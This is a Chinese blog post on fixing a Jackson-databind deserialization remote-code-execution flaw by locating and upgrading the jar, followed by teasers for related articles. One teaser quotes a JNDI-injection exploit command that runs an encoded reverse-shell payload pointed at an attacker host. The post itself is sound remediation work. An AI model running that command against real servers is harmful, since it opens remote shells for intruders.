Jackson序列化远程代码执行漏洞修复

最新推荐文章于 2024-06-27 22:49:26 发布
最新推荐文章于 2024-06-27 22:49:26 发布
阅读量4.3k 收藏 8
点赞数
分类专栏: 安全测试 互联网测试 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013908944/article/details/104670838
版权

**漏洞披露参考链接:**https://mp.weixin.qq.com/s/gHnSfsMuLLlk7lQ4f5Nkdw
漏洞影响:JNDI注入导致远程代码执行
CVE编号:暂时没发布,(fastjson的cve是CVE-2020-8840)
解决方案:1 升级jackson-databind >= 2.10.0
2 项目代码中剔除使用enableDefaultTyping类的使用,用官方给出的类替换。
解决步骤:1 在服务器上确实是否存在有小于 2.10.0的jackson-databind的jar包。

find / -name jackson-databin*
/home/jmeter/apache-jmeter-5.1.1/lib/jackson-databind-2.9.8.jar

可以看到存在该类,是jmeter在使用。
2 确实是否项目是否使用了该类

 grep -r 'enableDefaultTyping'   ${项目目录}

没有发现,说明没有调用该漏洞类,说明目前项目是安全的,但为了防止未来会发生,还是升级jackson为好。
3 升级jackson,直接替换该jar包。
下载地址:https://mvnrepository.com/artifact/com.fasterxml.jackson.core/jackson-databind/2.10.3
目前最新的是2.10.3版本。
下载
4 更新前对项目影响评估测试,该项目是jmeter测试工具项目,编写jmeter测试脚本进行测试验证脚本是否正常运行。
验证通过,脚本运行正常。
在这里插入图片描述
5 做好回滚备份,以防万一。

弘毅密令
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jackson序列化远程代码执行漏洞复现
Ms08067安全实验室
07-24 2229
本文作者:light(Ms08067实验室 SRSP TEAM小组成员)jackson介绍Jackson是一个能够将java对象序列化为JSON字符串,也能够将JSON字符串反序列化为j...
jackson 序列化_Jackson序列化远程代码执行漏洞预警,腾讯御界支持检测
weixin_39782832的博客
12-02 827
漏洞简介】近日,Jackson官方发布安全issue,披露Jackson存在最新的反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14379),可对6月21日披露的CVE-2019-12384漏洞绕过,成功利用可实现远程代码执行。建议Jackson的用户尽快升级至安全版本。【Jackson介绍】Jackson是一个简单基于Java应用库,Jackson可以轻松...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool(又名嵌入 org.glassfish 中的 Xalan)相关的序列化小工具和类型之间的交互。 web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
jackson-databind远程代码执行漏洞CVE-2020-8840)修复与测试
Quarrie的博客
05-03 3938
漏洞介绍 攻击者可以利用此漏洞通过JNDI注入的方式执行本地Web容器下的任意代码,后文中将测试LDAP方式的远程代码调用,受影响版参见:NVD。 修复建议 网上能找到的大部分修复建议是将jackson-databind的版本升级到2.9.10.4或后续版本,此方法的确行之有效,但是对于使用JDK1.6的老项目就比较尴尬,因为至2.8版本后jackson-databind字节码不再兼容JDK1.6...
网络安全筑基篇——反序列化漏洞
weixin_55762309的博客
06-27 1281
序列化漏洞原理详解
Jackson-databind 反序列化漏洞CVE-2017-7525)复现
HEAVEN569的博客
03-12 1954
1.漏洞出现的原因 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当json字符串转换的Target class中有polymorph fields,即字段类型为接口、抽象或Object类型时,攻击者可以通过在json字符串中指定变量的具体类型(子类或者接口实现类,)来实现实例化指定的类,借助某些特殊的class,如TemplatesImpl,可以实现任意代码执行。 所以本漏洞利用条件如下 1.开启JacksonPo..
Jackson--FastJson--XStream--代码执行&&反序列化
weixin_74985952的博客
10-17 275
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,base64反弹shell命令}|{base64,-d}|{bash,-i}” -A 攻击机地址。将xml类型payload替换使用JNDI工具生成的class文件地址发送至目标服务器接受解析。将JRMP监听地址替换xml型payload,抓包发送至目标服务器解析xml格式处。在利用该版本范围时,只能通过项目中所调用的模块和本身类文件来进行利用。
2020年12月27日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在反序列化远程代码执行漏洞CVE-2020-35728)。
罗彬桦的博客
08-25 1213
漏洞描述:2020年12月27日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在反序列化远程代码执行漏洞CVE-2020-35728)。利用该漏洞,攻击者可远程执行代码,控制服务器。若未使用enableDefaultTyping()方法,可忽略该漏洞。 安全版本: jackson-databind >= 2.9.10.8 (尚未推出) jackson-databind >= 2.10.0 漏洞缓解措施: 1.官方..
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
远程代码执行漏洞是一种极其危险的安全漏洞,攻击者可以利用它在受害者的系统上执行任意代码,从而控制或破坏系统。对于Jackson-CVE-2020-8840,问题在于Jackson-databind在反序列化JSON数据时的不安全配置。当...
weblogic 序列化漏洞测试及破解方式
11-30
漏洞主要涉及Apache Commons Collections库,该库是一个Java集合框架的扩展,但其中的一些功能在特定情况下可能导致远程代码执行(RCE)。 在“CommonsCollectionsTools.jar”中,存在一个名为`deserialization`...
jackson2.9.10反序列化补丁.zip
09-22
官方发布最新版本,当中修复了一处反序列化远程代码执行漏洞CVE-2020-24616),漏洞存在于br.com.anteros:Anteros-DBCP库类中,攻击者可以通过精心构造的请求包在受影响的 Jackson 服务器上进行远程代码执行
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
总结来说,Apache Druid的CVE-2021-25646远程代码执行漏洞是由于Jackson库的特定特性和Druid的JavaScript引擎交互造成的。了解这些细节有助于我们更好地理解和防范此类安全风险,确保数据安全和系统稳定性。在日常...
Java Web反序列化网络安全漏洞分析.pdf
03-31
Java Web反序列化漏洞是指在Java Web应用程序中,由于对序列化对象的不当处理,攻击者可以构造恶意的序列化数据,导致程序在反序列化过程中执行非预期的代码,从而引发安全问题。这种漏洞的存在使得攻击者可以绕过...
fastjson、jackson databind漏洞修复记录
Mr.Niu的博客
02-11 2566
解决方案也是让升级jar包到2.14.0-rc2版本或以上,但是直接升级的时候有问题,springboot中的 spring-boot-starter-web 包中包含了jackson的版本(里面有个 spring-boot-starter-json,这个包里制定了jackson的相关版本),升级springboot版本或者其他方式,都对现有的项目造成了影响。声明:本人所写博客无任何权威性,解决办法是否符合自己的项目,自行判断。项目运行无问题,jar的版本都符合解决方案,然后上线发布……
探索Jackson库的安全漏洞修复CVE-2020-8840
gitblog_00016的博客
04-05 509
探索Jackson库的安全漏洞修复CVE-2020-8840 项目地址:https://gitcode.com/jas502n/jackson-CVE-2020-8840 项目简介 在此GitCode仓库中,开发者jas502n分享了对Jackson库中一个关键安全漏洞CVE-2020-8840的研究和修复过程。Jackson是Java最流行的JSON处理库之一,广泛应用于Web服务、后端开发等...
logstash的jackson-databind漏洞修复
洁哥哥的博客
06-06 1422
代码jackson-databind漏洞修复
FasterXML Jackson-databind远程代码执行漏洞 CVE-2020-8840 已亲自复现 未完成
qq_42430287的博客
12-27 1479
受影响版本的jackson-databind中缺少某些xbean-reflect/JNDI黑名单类,如org.apache.xbean.propertyeditor.JndiConverter,导致攻击者可通过JNDI注入的方式对此漏洞进行利用,成功时可以实现远程代码执行。2.0.0
Jackson序列化漏洞原理
王嘟嘟的博客
02-28 3008
Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。那么当json中的指定的类的seter或者无参构造方法中存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。
漏洞修复系列】如何不安装软件或应用,直接查看软件内依赖包的版本信息?记一次漏洞修复实践分享
Yangy的博客
10-24 2371
本次修复漏洞的实践分享,就到这里啦。其实本次,主要是想记录一下如何快速找到安全版本的安装包或依赖包的经验,希望能帮助到遇到类似问题的朋友们~~另外,升级安装包或依赖包,一定要注意版本不同,可能或带来一些差异,或是报错等异常问题,所以,需要非常谨慎。建议在,开发测试环境,实践运行观察稳定之后,再切换到生产环境。避免线上出BUG,那就难搞了额!!!
Jackson序列化与反序列化简单代码
最新发布
08-10
Jackson是一个流行的Java库,用于处理JSON数据的转换,包括从JSON到Java对象(序列化)以及反之(反序列化)。以下是使用Jackson库进行序列化和反序列化的简单示例: ```java // 导入所需的Jackson库 import com.fasterxml.jackson.databind.ObjectMapper; // 定义一个简单的Java类代表JSON对象 public class Person { private String name; private int age; // getters and setters... } // 序列化(将Person对象转换为JSON) ObjectMapper mapper = new ObjectMapper(); Person person = new Person("John", 30); String json = mapper.writeValueAsString(person); // 反序列化(将JSON转换回Person对象) String jsonString = "{\"name\":\"Alice\", \"age\":25}"; Person fromJson = mapper.readValue(jsonString, Person.class); // 相关问题-- 1. Jackson库的主要优点是什么? 2. 如何处理嵌套的对象或数组的序列化? 3. 如果JSON字符串格式错误会发生什么?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值